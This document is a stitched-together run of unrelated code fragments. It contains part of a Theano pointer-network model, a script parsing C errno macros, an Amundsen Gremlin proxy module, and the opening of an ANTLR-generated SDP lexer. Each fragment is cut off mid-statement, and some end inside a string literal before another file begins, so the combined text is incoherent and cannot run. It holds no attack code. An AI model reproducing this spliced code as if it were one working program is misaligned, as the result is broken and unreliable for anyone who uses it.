outputs_info=[h0, c0],
name='encoding',
n_steps=n_sizes)
hiddens, cells = rval # hiddens: n_sizes * n_samples * dim_proj
# hiddens = tensor.concatenate([tensor.shape_padleft(h0), hiddens], axis=0)
f_encode = theano.function([p_mask, p], hiddens)
# decoding
hiddens_mask = tensor.set_subtensor(p_mask[0, :], tensor.constant(1, dtype=config.floatX))
# hiddens_mask = tensor.concatenate([tensor.ones((1, n_samples), dtype=config.floatX), p_mask], axis=0)
rval, _ = theano.scan(_ptr_probs,
sequences=[x_mask, x],
outputs_info=[hiddens[-1], # n_samples * dim_proj
tensor.alloc(numpy_floatX(0.), n_samples, options['dim_proj']), # cells[-1],
tensor.alloc(numpy_floatX(0.), n_sizes, n_samples)],
non_sequences=[hiddens, hiddens_mask],
name='decoding',
n_steps=n_steps)
preds = rval[2]
f_decode = theano.function([p_mask, p, x_mask, x], preds)
# generating
# xi, vector
# xi_mask, vector
# hidi, matrix beam_width * dim_proj
# celi matrix beam_width * dim_proj
# hids,
<filename>generate.py
#!/usr/bin/env python
# Contains a very primitive and incomplete parser of C preprocessor directives.
# May accidentally read invalid C source without any errors.
import collections
import json
import os.path
import re
import sys
import six
_TOKENS = (
_T_HASH,
_T_IDENTIFIER,
_T_INT,
_T_STRING,
_T_INCLUDE,
_T_OTHER,
) = (
re.compile(r'#'),
re.compile(r'[_a-zA-Z][_0-9a-zA-Z]*'),
re.compile(r'[+-]?[0-9]+'),
re.compile(r'"([^"]*)"'), # TODO: "a\"b".
re.compile(r'<([^>]*)>'),
re.compile(r'\S+'),
)
_QUIRKS = {
'none': {},
'linux': {},
'macos': {
'no_includes': True,
'id_blacklist': {'errno'},
},
'windows': {
'no_includes': True,
'id_blacklist': {'errno'},
},
}
def _read_lines(f_name):
line_n = 0
rel_f_name = os.path.relpath(f_name)
with open(f_name, 'r') as f_obj:
for raw_line in f_obj:
line_n += 1
yield rel_f_name, line_n, raw_line
def _merge_continued_lines(raw_lines):
f_name = '<error>'
line_n = -1
prev = None
for f_name, line_n, raw_line in raw_lines:
rstripped = raw_line.rstrip()
if rstripped[-1:] == '\\':
if prev is None:
prev = rstripped[:-1]
else:
prev += rstripped[:-1]
else:
if prev is not None:
raw_line = prev + raw_line
prev = None
yield f_name, line_n, raw_line
if prev is not None:
raise RuntimeError(
'%s:%d: EOF after backslash-newline' % (
f_name, line_n))
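# Illustrative sketch (not part of the original script): _merge_continued_lines
# above joins physical lines that end with a backslash. For the made-up two-line
# input below it yields a single logical line "#define FOO 1\n", tagged with the
# line number of its last physical line.
def _example_merge_continued_lines():
    fake = [('fake.h', 1, '#define FOO \\\n'), ('fake.h', 2, '1\n')]
    return list(_merge_continued_lines(fake))  # -> [('fake.h', 2, '#define FOO 1\n')]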
def _replace_comments(raw_lines):
# TODO: Ignore comments within string literals.
f_name = '<error>'
line_n = -1
multiline_block = None
prev = None
for f_name, line_n, raw_line in raw_lines:
ready_comments = []
if multiline_block is not None:
# Multiline block comment was previously started.
block_end = raw_line.find('*/')
if block_end == -1:
# Whole line is in the block comment.
multiline_block += raw_line
raw_line = ''
else:
# End of the block comment.
multiline_block += raw_line[:block_end]
raw_line = prev + ' ' + raw_line[block_end + 2:]
prev = None
ready_comments.append(multiline_block)
multiline_block = None
if multiline_block is None:
# Normal line.
search_pos = 0
while search_pos < len(raw_line):
block_start = raw_line.find('/*', search_pos)
if block_start == -1:
# No block comments in this line.
new_multiline_block = None
block_comment = None
new_raw_line = raw_line
new_search_pos = len(new_raw_line)
else:
block_end = raw_line.find('*/', block_start + 2)
if block_end == -1:
# Start of multiline block comment.
new_multiline_block = raw_line[block_start + 2:]
block_comment = None
new_raw_line = ''
prev = raw_line[:block_start]
new_search_pos = len(new_raw_line)
else:
# Short block comment.
new_multiline_block = None
block_comment = raw_line[block_start + 2:block_end]
new_raw_line = \
raw_line[:block_start] + \
' ' + \
raw_line[block_end + 2:]
new_search_pos = block_start + 1
# Check for line comment.
if block_start == -1:
block_start = len(raw_line)
line_start = raw_line.find('//', search_pos, block_start)
if line_start == -1:
multiline_block = new_multiline_block
if block_comment is not None:
ready_comments.append(block_comment)
raw_line = new_raw_line
search_pos = new_search_pos
else:
prev = None
ready_comments.append(raw_line[line_start + 2:])
raw_line = raw_line[:line_start]
search_pos = len(raw_line)
yield f_name, line_n, raw_line, ready_comments
if multiline_block is not None:
raise RuntimeError(
'%s:%d: EOF without closing multiline block comment' % (
f_name, line_n))
def _skip_empty(raw_lines):
for f_name, line_n, raw_line, comments in raw_lines:
if raw_line.strip():
yield f_name, line_n, raw_line, comments
def _tokenize(raw_lines):
for f_name, line_n, raw_line, comments in raw_lines:
tokens = []
while True:
raw_line = raw_line.lstrip()
if not raw_line:
break
match = None
match_re = None
for token_re in _TOKENS:
match = token_re.match(raw_line)
if match is not None:
match_re = token_re
break
if match is None:
raise RuntimeError(
'%s:%d: Unknown token %r' % (
f_name, line_n, raw_line))
else:
raw_line = raw_line[len(match.group(0)):]
tokens.append((match, match_re))
yield f_name, line_n, tokens, comments
def _match_token(token, reference):
if reference is None:
# Any token.
return True
if hasattr(reference, 'match'):
# Matched with specific regex.
_, match_re = token
return match_re == reference
# Fixed string.
match, _ = token
return match.group(0) == reference
def _match_tokens(tokens, reference, full=True):
if reference:
if tokens:
return _match_token(tokens[0], reference[0]) & \
_match_tokens(tokens[1:], reference[1:], full)
else:
return False
else:
if full:
if tokens:
return False
else:
return True
else:
return True
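# Illustrative sketch (not part of the original script): shows how the
# (match, regex) token tuples produced by _tokenize() are checked by
# _match_tokens(). A reference entry may be a regex (match by token type), a
# fixed string (match by exact text), or None (match any token). The input
# tokens below are built from a made-up line "#define EFOO 5".
def _example_match_tokens():
    tokens = []
    for raw in ('#', 'define', 'EFOO', '5'):
        for token_re in _TOKENS:
            match = token_re.match(raw)
            if match is not None:
                tokens.append((match, token_re))
                break
    return _match_tokens(tokens, (_T_HASH, 'define', _T_IDENTIFIER, _T_INT))  # -> True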
def _process_ifdefs(token_lines, defined=None):
# TODO: support #if and #elif.
f_name = '<error>'
line_n = -1
if defined is None:
defined = {}
state = []
enabled = []
for f_name, line_n, tokens, comments in token_lines:
if _match_tokens(
tokens,
(
_T_HASH,
'ifdef',
_T_IDENTIFIER,
)):
state.append('ifdef')
enabled.append(tokens[2][0].group(0) in defined)
elif _match_tokens(
tokens,
(
_T_HASH,
'ifndef',
_T_IDENTIFIER,
)):
state.append('ifndef')
enabled.append(tokens[2][0].group(0) not in defined)
elif _match_tokens(
tokens,
(
_T_HASH,
'else',
)):
if not state:
raise RuntimeError(
'%s:%d: Unexpected #else (no #ifdef/#ifndef)' % (
f_name, line_n))
if state.pop() in ('ifdef', 'ifndef'):
state.append('else')
enabled[-1] = not enabled[-1]
else:
raise RuntimeError(
'%s:%d: Unexpected #else (not #ifdef/#ifndef)' % (
f_name, line_n))
elif _match_tokens(
tokens,
(
_T_HASH,
'endif',
)):
if not state:
raise RuntimeError(
'%s:%d: Unexpected #endif (no #ifdef/#ifndef/#else)' % (
f_name, line_n))
state.pop()
enabled.pop()
elif _match_tokens(
tokens,
(
_T_HASH,
'if',
None,
), False):
# Hack to "ignore" #if.
# Breaks #else.
state.append('ifdef')
enabled.append(False)
else:
if all(enabled):
yield f_name, line_n, tokens, comments
if state:
raise RuntimeError(
'%s:%d: #ifdef/#ifndef not closed' % (
f_name, line_n))
def _read_tokens_from_single_file(f_name):
lines = _read_lines(f_name)
lines = _merge_continued_lines(lines)
lines = _replace_comments(lines)
lines = _skip_empty(lines)
token_lines = _tokenize(lines)
token_lines = _process_ifdefs(token_lines)
return token_lines
def _find_include(base_f_name, base_line_n, inc_rel, include_paths):
for inc_path in include_paths:
inc_full = os.path.join(inc_path, inc_rel)
if os.path.exists(inc_full):
return inc_full
raise RuntimeError(
'%s:%d: File %r not found' % (
base_f_name, base_line_n, inc_rel))
def _read_tokens_from_file(f_name, include_paths, quirks):
no_includes = quirks.get('no_includes', False)
files = [_read_tokens_from_single_file(f_name)]
past_includes = {f_name}
while files:
try:
f_name, line_n, tokens, comments = next(files[-1])
if _match_tokens(
tokens,
(
_T_HASH,
'include',
None,
)):
include, include_re = tokens[2]
if not no_includes:
if include_re == _T_STRING:
cur_include_paths = \
[os.path.dirname(os.path.abspath(f_name))] + \
include_paths
elif include_re == _T_INCLUDE:
cur_include_paths = include_paths
else:
raise RuntimeError(
'%s:%d: Invalid include' % (
f_name, line_n))
if include.group(1) in past_includes:
raise RuntimeError(
'%s:%d: Duplicate include: %r' % (
f_name, line_n, include.group(1)))
past_includes.add(include.group(1))
include = _find_include(f_name, line_n, include.group(1),
cur_include_paths)
files.append(_read_tokens_from_single_file(include))
else:
yield f_name, line_n, tokens, comments
except StopIteration:
files.pop()
def _get_errno_consts(token_lines, quirks):
errno_consts = collections.OrderedDict()
# Saves only first code.
by_num = {}
id_blacklist = quirks.get('id_blacklist', {})
for f_name, line_n, tokens, comments in token_lines:
if _match_tokens(
tokens,
(
_T_HASH,
'undef',
_T_IDENTIFIER,
), False):
ident = tokens[2][0].group(0)
if ident[:1] == 'E':
if ident not in errno_consts:
raise RuntimeError(
'%s:%d: #undef of undefined macro' % (
f_name, line_n))
errno_consts.pop(ident)
continue
elif not _match_tokens(
tokens,
(
_T_HASH,
'define',
None,
None,
), False):
continue
if len(tokens) != 4:
raise RuntimeError(
'%s:%d: Unexpected number of tokens' % (
f_name, line_n))
if tokens[2][1] != _T_IDENTIFIER:
raise RuntimeError(
'%s:%d: Invalid identifier' % (
f_name, line_n))
ident = tokens[2][0].group(0)
if ident in id_blacklist:
continue
if len(ident) < 3:
raise RuntimeError(
'%s:%d: Too short identifier' % (
f_name, line_n))
if ident.upper() != ident:
raise RuntimeError(
'%s:%d: Identifier contains non-capital letters' % (
f_name, line_n))
if ident[0] != 'E':
raise RuntimeError(
'%s:%d: Identifier is not starting with \'E\'' % (
f_name, line_n))
if tokens[3][1] == _T_INT:
num = int(tokens[3][0].group(0))
if num <= 0:
raise RuntimeError(
'%s:%d: Errno code <= 0 (%d)' % (
f_name, line_n, num))
code = num
elif tokens[3][1] == _T_IDENTIFIER:
existing_ident = tokens[3][0].group(0)
existing = errno_consts.get(existing_ident)
if existing is None:
raise RuntimeError(
'%s:%d: Existing errno constant not found (%s)' % (
f_name, line_n, existing_ident))
else:
code = existing_ident
num = existing_ident
while isinstance(num, six.string_types):
num = errno_consts[num]['code']
if not comments:
comments = ['Same as %s (%s)' % (existing_ident,
existing['comment'])]
else:
raise RuntimeError(
'%s:%d: Invalid errno code' % (
f_name, line_n))
if ident in errno_consts:
raise RuntimeError(
'%s:%d: Duplicate definition (%s)' % (
f_name, line_n, ident))
if not comments:
existing_ident = by_num.get(num)
if existing_ident is None:
raise RuntimeError(
'%s:%d: No comments' % (
f_name, line_n))
else:
existing = errno_consts[existing_ident]
comments = ['Same as %s (%s)' % (existing_ident,
existing['comment'])]
if len(comments) > 1:
raise RuntimeError(
'%s:%d: Too many comments' % (
f_name, line_n))
by_num.setdefault(num, ident)
errno_consts[ident] = {
'code': code,
'comment': comments[0].strip()
}
return errno_consts
def _test(token_lines, quirks):
result = {
'tokens': [],
}
def _append_tokens(tl):
for f, l, t, c in tl:
result['tokens'].append(
[
list(map(lambda m: m[0].group(0), t)),
c,
]
)
yield f, l, t, c
try:
result['errno_consts'] = _get_errno_consts(
_append_tokens(token_lines), quirks)
except RuntimeError as error:
sys.stdout.write('ERROR: %s\n' % (error.args[0], ))
sys.stdout.flush()
sys.exit(1)
json.dump(result, sys.stdout, indent=4, separators=(',', ': '),
sort_keys=True)
sys.stdout.write('\n')
sys.stdout.flush()
_PREAMBLE = '''
// This file is generated automatically. Do not modify it by hand.
// For code generated by `phf_codegen`.
#![cfg_attr(feature = "cargo-clippy", allow(unreadable_literal))]
use std;
use
<gh_stars>0
# Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import collections
import json
import logging
from abc import abstractmethod
from datetime import date, datetime, timedelta
from operator import attrgetter
from typing import (Any, Callable, Dict, Iterable, List, Mapping, Optional,
Sequence, Set, Type, TypeVar, Union, no_type_check,
overload)
from urllib.parse import unquote
import gremlin_python
from amundsen_common.models.dashboard import DashboardSummary
from amundsen_common.models.lineage import Lineage
from amundsen_common.models.popular_table import PopularTable
from amundsen_common.models.table import (Application, Column,
ProgrammaticDescription, Reader,
Source, Stat, Table, Tag, Watermark)
from amundsen_common.models.user import User
from amundsen_gremlin.gremlin_model import (EdgeType, EdgeTypes, VertexType,
VertexTypes, WellKnownProperties)
from amundsen_gremlin.gremlin_shared import \
append_traversal as _append_traversal # TODO: rename the references
from amundsen_gremlin.gremlin_shared import (make_column_uri,
make_description_uri)
from amundsen_gremlin.neptune_bulk_loader.gremlin_model_converter import \
ensure_vertex_type
from amundsen_gremlin.script_translator import (
ScriptTranslator, ScriptTranslatorTargetJanusgraph)
from amundsen_gremlin.test_and_development_shard import get_shard
from gremlin_python.driver.client import Client
from gremlin_python.driver.driver_remote_connection import \
DriverRemoteConnection
from gremlin_python.driver.resultset import ResultSet
from gremlin_python.process.anonymous_traversal import traversal
from gremlin_python.process.graph_traversal import (GraphTraversal,
GraphTraversalSource, V,
__, bothV, coalesce,
constant, has, inE, inV,
outE, outV, select, unfold,
valueMap, values)
from gremlin_python.process.traversal import Cardinality
from gremlin_python.process.traversal import Column as MapColumn
from gremlin_python.process.traversal import (Direction, Order, P, T, TextP,
Traversal, gte, not_, within,
without)
from neptune_python_utils.gremlin_utils import ExtendedGraphSONSerializersV3d0
from overrides import overrides
from tornado import httpclient
from typing_extensions import Protocol # TODO: it's in typing 3.8
from metadata_service.entity.dashboard_detail import \
DashboardDetail as DashboardDetailEntity
from metadata_service.entity.description import Description
from metadata_service.entity.resource_type import ResourceType
from metadata_service.entity.tag_detail import TagDetail
from metadata_service.exception import NotFoundException
from metadata_service.proxy.statsd_utilities import timer_with_counter
from metadata_service.util import UserResourceRel
from .base_proxy import BaseProxy
from .shared import checkNotNone, retrying
# don't use statics.load_statics(globals()) it plays badly with mypy
__all__ = ['AbstractGremlinProxy', 'GenericGremlinProxy']
LOGGER = logging.getLogger(__name__)
PUBLISH_TAG_TIME_FORMAT: str = "%Y-%m-%d %H:%M"
AMUNDSEN_TIMESTAMP_KEY: str = 'amundsen_updated_timestamp'
def timestamp() -> datetime:
"""
mostly for mocking
See also https://docs.aws.amazon.com/neptune/latest/userguide/best-practices-gremlin-datetime-glv.html
and DateIO in gremlin python
"""
return datetime.now()
def is_reasonable_vertex_label(label: str) -> bool:
vertex_labels = set([each.value.label for each in VertexTypes])
return label in vertex_labels
def get_label_from(_entity_type_or_enum_or_str: Union[str, VertexTypes, EdgeTypes, VertexType, EdgeType]) -> str:
if isinstance(_entity_type_or_enum_or_str, str):
return _entity_type_or_enum_or_str
elif isinstance(_entity_type_or_enum_or_str, (VertexTypes, EdgeTypes)):
return _entity_type_or_enum_or_str.value.label
elif isinstance(_entity_type_or_enum_or_str, (VertexType, EdgeType)):
return _entity_type_or_enum_or_str.label
else:
raise RuntimeError(f'what the heck is label? {type(_entity_type_or_enum_or_str)} {_entity_type_or_enum_or_str}')
def get_cardinality_for(_entity_type_or_enum: Union[VertexTypes, EdgeTypes, VertexType, EdgeType],
name: str) -> Optional[Cardinality]:
_entity_type: Union[VertexType, EdgeType]
if isinstance(_entity_type_or_enum, (VertexTypes, EdgeTypes)):
_entity_type = _entity_type_or_enum.value
elif isinstance(_entity_type_or_enum, (VertexType, EdgeType)):
_entity_type = _entity_type_or_enum
else:
raise AssertionError(f'thing is not a VertexType(s) or EdgeType(s): {_entity_type_or_enum}')
properties = _entity_type.properties_as_map()
# TODO: this will expose missing properties
if name not in properties:
raise AssertionError(f'missing {name} property in {_entity_type_or_enum} {properties}')
maybe = properties[name].cardinality
if isinstance(_entity_type, VertexType):
return maybe.value if maybe is not None else Cardinality.single
elif isinstance(_entity_type, EdgeType):
return maybe.value if maybe is not None else None
else:
raise AssertionError(f'thing is not a VertexType(s) or EdgeType(s): {_entity_type_or_enum}')
class FromResultSet:
@classmethod
def generator(cls, result_set: ResultSet) -> Iterable[Any]:
for part in result_set:
for item in part:
yield item
@classmethod
def iterate(cls, result_set: ResultSet) -> None:
# haiku for consuming an iterator
collections.deque(cls.generator(result_set), maxlen=0)
@classmethod
def next(cls, result_set: ResultSet) -> Any:
"""
Really this is like "first": return the first item, raising StopIteration if the result set is empty.
"""
return next(iter(cls.generator(result_set)))
@classmethod
def toList(cls, result_set: ResultSet) -> List:
return list(cls.generator(result_set))
@classmethod
def toSet(cls, result_set: ResultSet) -> Set:
return set(cls.generator(result_set))
@classmethod
def getOptional(cls, result_set: ResultSet) -> Optional[Any]:
try:
return cls.getOnly(result_set)
except StopIteration:
return None
@classmethod
def getOnly(cls, result_set: ResultSet) -> Any:
i = iter(cls.generator(result_set))
value = next(i)
try:
next(i)
except StopIteration:
return value
raise RuntimeError('Expected one item, but there was more!')
TYPE = TypeVar('TYPE')
class ExecuteQuery(Protocol):
@overload # noqa: F811
def __call__(self, query: Traversal, get: Callable[[ResultSet], V]) -> V:
...
@overload # noqa: F811
def __call__(self, query: str, get: Callable[[ResultSet], V], *, # noqa: F811
bindings: Optional[Mapping[str, Any]] = None) -> V:
...
def __call__(self, query: Union[str, Traversal], get: Callable[[ResultSet], V], *, # noqa: F811
bindings: Optional[Mapping[str, Any]] = None) -> V:
...
class ClientQueryExecutor(ExecuteQuery):
def __init__(self, *, client: Client, traversal_translator: Callable[[Traversal], str]) -> None:
self.client = client
self.traversal_translator = traversal_translator
def __call__(self, query: Union[str, Traversal], get: Callable[[ResultSet], V], *, # noqa: F811
bindings: Optional[Mapping[str, Any]] = None) -> V:
if isinstance(query, Traversal):
if bindings is not None:
raise AssertionError(f'expected bindings to be none')
query_text = self.traversal_translator(query)
else:
query_text = query
if not isinstance(query_text, str):
raise AssertionError(f'expected str')
result_set = self.client.submit(query_text, bindings)
return get(result_set)
class RetryingClientQueryExecutor(ClientQueryExecutor):
def __init__(self, client: Client, traversal_translator: Callable[[Traversal], str],
is_retryable: Callable[[Exception], bool]) -> None:
ClientQueryExecutor.__init__(self, client=client, traversal_translator=traversal_translator)
self.is_retryable = is_retryable
def __enter__(self) -> Any:
return self
def __exit__(self, *args: Any, **kwargs: Any) -> None:
return self.client.close()
# TODO: ideally this would be __call__(*args: Any, **kwargs: Any) -> Any (and then this could be mixinable) but I
# can't get mypy to not think that conflicts
def __call__(self, query: Union[str, Traversal], get: Callable[[ResultSet], V], *,
bindings: Optional[Mapping[str, Any]] = None) -> V:
def callable() -> V:
return ClientQueryExecutor.__call__(self, query, get, bindings=bindings)
try:
return retrying(callable, is_retryable=self.is_retryable)
except Exception as e:
LOGGER.warning(f'got exception executing query={query}, get={get}, bindings={bindings}', exc_info=e)
raise
@no_type_check
def _safe_get_any(root, *keys):
"""
Helper for getting a value from a nested dict, geared towards Gremlin valueMap results where each property
arrives as a list of zero or one element.
:param root:
:param keys:
:return:
"""
current = root
for key in keys:
# first get the only element if it's a list/set
if isinstance(current, Sequence):
if len(current) > 1:
raise RuntimeError(f'{current} is not a singleton! root={root} keys={keys}')
elif len(current) == 0:
current = None
else:
current = current[0]
if not current:
return None
if not isinstance(current, Mapping):
raise RuntimeError(f'{current} is not a Mapping! root={root} keys={keys}')
current = current.get(key)
if not current:
return None
# don't dereference the list this usually is, we might want it or not
return current
@no_type_check
def _safe_get_list(root, *keys, transform: Optional[Callable] = None):
"""
Like _safe_get_any, but for gremlin where we get a list for a single property
"""
values = _safe_get_any(root, *keys)
# is List the only type? it seems so
if values is None:
return None
elif not isinstance(values, List):
raise RuntimeError(f'{values} is not a List! root={root} keys={keys}')
elif transform is None:
return sorted(values)
elif len(values) > 0 and type(values[0]) == datetime and transform == int:
# need to do something special for datetimes we are transforming into ints
return sorted([transform(value.timestamp()) for value in values])
else:
return sorted([transform(value) for value in values])
@no_type_check
def _safe_get(root, *keys, transform: Optional[Callable] = None, default: Any = None):
"""
Like _safe_get_list, but expects at most a single value and returns it unwrapped (or `default` if absent).
"""
value = _safe_get_list(root, *keys, transform=transform)
if value is None or len(value) == 0:
return default
elif len(value) > 1:
raise RuntimeError(f'{value} is not a singleton! root={root} keys={keys}')
else:
return value[0]
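def _example_safe_get() -> None:
    """
    Illustrative only (not part of the original proxy): the _safe_get* helpers
    above unwrap Gremlin valueMap()-style results, where each property value
    arrives wrapped in a list of zero or one element. The dict below is made up.
    """
    value_map = {'name': ['hive_table'], 'is_view': [False]}
    assert _safe_get(value_map, 'name') == 'hive_table'
    assert _safe_get(value_map, 'missing', default='n/a') == 'n/a'
    assert _safe_get_list(value_map, 'name') == ['hive_table']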
def _properties_or_drop_if_changed_except(
*excludes: str, label: Union[VertexTypes, EdgeTypes, VertexType, EdgeType],
thing: Union[object, Dict[str, Any]], existing: Union[object, Dict[str, Any]]) -> GraphTraversal:
if isinstance(thing, Mapping):
_thing = thing
elif hasattr(thing, '__dict__'):
_thing = vars(thing)
else:
raise AssertionError(f'thing must be a dict or have __dict__: {type(thing)}')
if isinstance(existing, Mapping):
_existing = existing
elif hasattr(existing, '__dict__'):
_existing = vars(existing)
else:
raise AssertionError(f'existing must be a dict or have __dict__: {type(existing)}')
def p(name: str) -> Optional[GraphTraversal]:
return _property_or_drop_if_changed(name=name, value=_thing.get(name, None), existing=_existing.get(name, None),
cardinality=get_cardinality_for(label, name))
names = sorted(set(_thing.keys()).difference(set(excludes)))
traversals = [t for t in [p(name) for name in names] if t is not None]
return _append_traversal(__.start(), *traversals) if traversals else None
def _property_unchanged(*, value: Any, existing: Any, cardinality: Optional[Cardinality]) -> bool:
# this is the usual case: either an Edge property (no cardinality) or Vertex property with Cardinality.single
if existing is None:
return value is None
elif cardinality is None or cardinality == Cardinality.single:
return tuple(existing) == (value,)
elif cardinality in (Cardinality.set_, Cardinality.list_):
return value in tuple(existing)
else:
return False
def _property_or_drop_if_changed(*, name: str, value: Any, existing: Any, cardinality: Optional[Cardinality]) \
-> Optional[GraphTraversal]:
"""
You want to use _vertex_property or _edge_property.
"""
if _property_unchanged(value=value, existing=existing, cardinality=cardinality):
return None
elif value is None:
return __.sideEffect(__.properties(name).drop())
else:
# complicated: edges can't have cardinality supplied and are implied to be single
if cardinality is None:
return __.property(name, value)
else:
return __.property(cardinality, name, value)
def _properties_or_drop_except(label: Union[VertexTypes, EdgeTypes, VertexType, EdgeType],
thing: Union[object, Dict[str, Any]], *excludes: str) -> GraphTraversal:
if isinstance(thing, Mapping):
pass
elif hasattr(thing, '__dict__'):
thing = vars(thing)
else:
raise AssertionError(f'must be a dict or have __dict__: {type(thing)}')
g = __.start()
for name in set(thing.keys()).difference(set(excludes)):
g = _property_or_drop(g=g, name=name, value=thing.get(name, None), cardinality=get_cardinality_for(label, name))
return g
def _properties_or_drop_of(label: Union[VertexTypes, EdgeTypes, VertexType, EdgeType],
thing: Union[object, Dict[str, Any]], *includes: str) -> GraphTraversal:
if isinstance(thing, Mapping):
| |
<reponame>cameronelliott/sdp-antlr-abnf
# Generated from sdp.g4 by ANTLR 4.8
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2\u0102")
buf.write("\u0403\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\t")
buf.write("C\4D\tD\4E\tE\4F\tF\4G\tG\4H\tH\4I\tI\4J\tJ\4K\tK\4L\t")
buf.write("L\4M\tM\4N\tN\4O\tO\4P\tP\4Q\tQ\4R\tR\4S\tS\4T\tT\4U\t")
buf.write("U\4V\tV\4W\tW\4X\tX\4Y\tY\4Z\tZ\4[\t[\4\\\t\\\4]\t]\4")
buf.write("^\t^\4_\t_\4`\t`\4a\ta\4b\tb\4c\tc\4d\td\4e\te\4f\tf\4")
buf.write("g\tg\4h\th\4i\ti\4j\tj\4k\tk\4l\tl\4m\tm\4n\tn\4o\to\4")
buf.write("p\tp\4q\tq\4r\tr\4s\ts\4t\tt\4u\tu\4v\tv\4w\tw\4x\tx\4")
buf.write("y\ty\4z\tz\4{\t{\4|\t|\4}\t}\4~\t~\4\177\t\177\4\u0080")
buf.write("\t\u0080\4\u0081\t\u0081\4\u0082\t\u0082\4\u0083\t\u0083")
buf.write("\4\u0084\t\u0084\4\u0085\t\u0085\4\u0086\t\u0086\4\u0087")
buf.write("\t\u0087\4\u0088\t\u0088\4\u0089\t\u0089\4\u008a\t\u008a")
buf.write("\4\u008b\t\u008b\4\u008c\t\u008c\4\u008d\t\u008d\4\u008e")
buf.write("\t\u008e\4\u008f\t\u008f\4\u0090\t\u0090\4\u0091\t\u0091")
buf.write("\4\u0092\t\u0092\4\u0093\t\u0093\4\u0094\t\u0094\4\u0095")
buf.write("\t\u0095\4\u0096\t\u0096\4\u0097\t\u0097\4\u0098\t\u0098")
buf.write("\4\u0099\t\u0099\4\u009a\t\u009a\4\u009b\t\u009b\4\u009c")
buf.write("\t\u009c\4\u009d\t\u009d\4\u009e\t\u009e\4\u009f\t\u009f")
buf.write("\4\u00a0\t\u00a0\4\u00a1\t\u00a1\4\u00a2\t\u00a2\4\u00a3")
buf.write("\t\u00a3\4\u00a4\t\u00a4\4\u00a5\t\u00a5\4\u00a6\t\u00a6")
buf.write("\4\u00a7\t\u00a7\4\u00a8\t\u00a8\4\u00a9\t\u00a9\4\u00aa")
buf.write("\t\u00aa\4\u00ab\t\u00ab\4\u00ac\t\u00ac\4\u00ad\t\u00ad")
buf.write("\4\u00ae\t\u00ae\4\u00af\t\u00af\4\u00b0\t\u00b0\4\u00b1")
buf.write("\t\u00b1\4\u00b2\t\u00b2\4\u00b3\t\u00b3\4\u00b4\t\u00b4")
buf.write("\4\u00b5\t\u00b5\4\u00b6\t\u00b6\4\u00b7\t\u00b7\4\u00b8")
buf.write("\t\u00b8\4\u00b9\t\u00b9\4\u00ba\t\u00ba\4\u00bb\t\u00bb")
buf.write("\4\u00bc\t\u00bc\4\u00bd\t\u00bd\4\u00be\t\u00be\4\u00bf")
buf.write("\t\u00bf\4\u00c0\t\u00c0\4\u00c1\t\u00c1\4\u00c2\t\u00c2")
buf.write("\4\u00c3\t\u00c3\4\u00c4\t\u00c4\4\u00c5\t\u00c5\4\u00c6")
buf.write("\t\u00c6\4\u00c7\t\u00c7\4\u00c8\t\u00c8\4\u00c9\t\u00c9")
buf.write("\4\u00ca\t\u00ca\4\u00cb\t\u00cb\4\u00cc\t\u00cc\4\u00cd")
buf.write("\t\u00cd\4\u00ce\t\u00ce\4\u00cf\t\u00cf\4\u00d0\t\u00d0")
buf.write("\4\u00d1\t\u00d1\4\u00d2\t\u00d2\4\u00d3\t\u00d3\4\u00d4")
buf.write("\t\u00d4\4\u00d5\t\u00d5\4\u00d6\t\u00d6\4\u00d7\t\u00d7")
buf.write("\4\u00d8\t\u00d8\4\u00d9\t\u00d9\4\u00da\t\u00da\4\u00db")
buf.write("\t\u00db\4\u00dc\t\u00dc\4\u00dd\t\u00dd\4\u00de\t\u00de")
buf.write("\4\u00df\t\u00df\4\u00e0\t\u00e0\4\u00e1\t\u00e1\4\u00e2")
buf.write("\t\u00e2\4\u00e3\t\u00e3\4\u00e4\t\u00e4\4\u00e5\t\u00e5")
buf.write("\4\u00e6\t\u00e6\4\u00e7\t\u00e7\4\u00e8\t\u00e8\4\u00e9")
buf.write("\t\u00e9\4\u00ea\t\u00ea\4\u00eb\t\u00eb\4\u00ec\t\u00ec")
buf.write("\4\u00ed\t\u00ed\4\u00ee\t\u00ee\4\u00ef\t\u00ef\4\u00f0")
buf.write("\t\u00f0\4\u00f1\t\u00f1\4\u00f2\t\u00f2\4\u00f3\t\u00f3")
buf.write("\4\u00f4\t\u00f4\4\u00f5\t\u00f5\4\u00f6\t\u00f6\4\u00f7")
buf.write("\t\u00f7\4\u00f8\t\u00f8\4\u00f9\t\u00f9\4\u00fa\t\u00fa")
buf.write("\4\u00fb\t\u00fb\4\u00fc\t\u00fc\4\u00fd\t\u00fd\4\u00fe")
buf.write("\t\u00fe\4\u00ff\t\u00ff\4\u0100\t\u0100\4\u0101\t\u0101")
buf.write("\3\2\3\2\3\3\3\3\3\4\3\4\3\5\3\5\3\6\3\6\3\7\3\7\3\b\3")
buf.write("\b\3\t\3\t\3\n\3\n\3\13\3\13\3\f\3\f\3\r\3\r\3\16\3\16")
buf.write("\3\17\3\17\3\20\3\20\3\21\3\21\3\22\3\22\3\23\3\23\3\24")
buf.write("\3\24\3\25\3\25\3\26\3\26\3\27\3\27\3\30\3\30\3\31\3\31")
buf.write("\3\32\3\32\3\33\3\33\3\34\3\34\3\35\3\35\3\36\3\36\3\37")
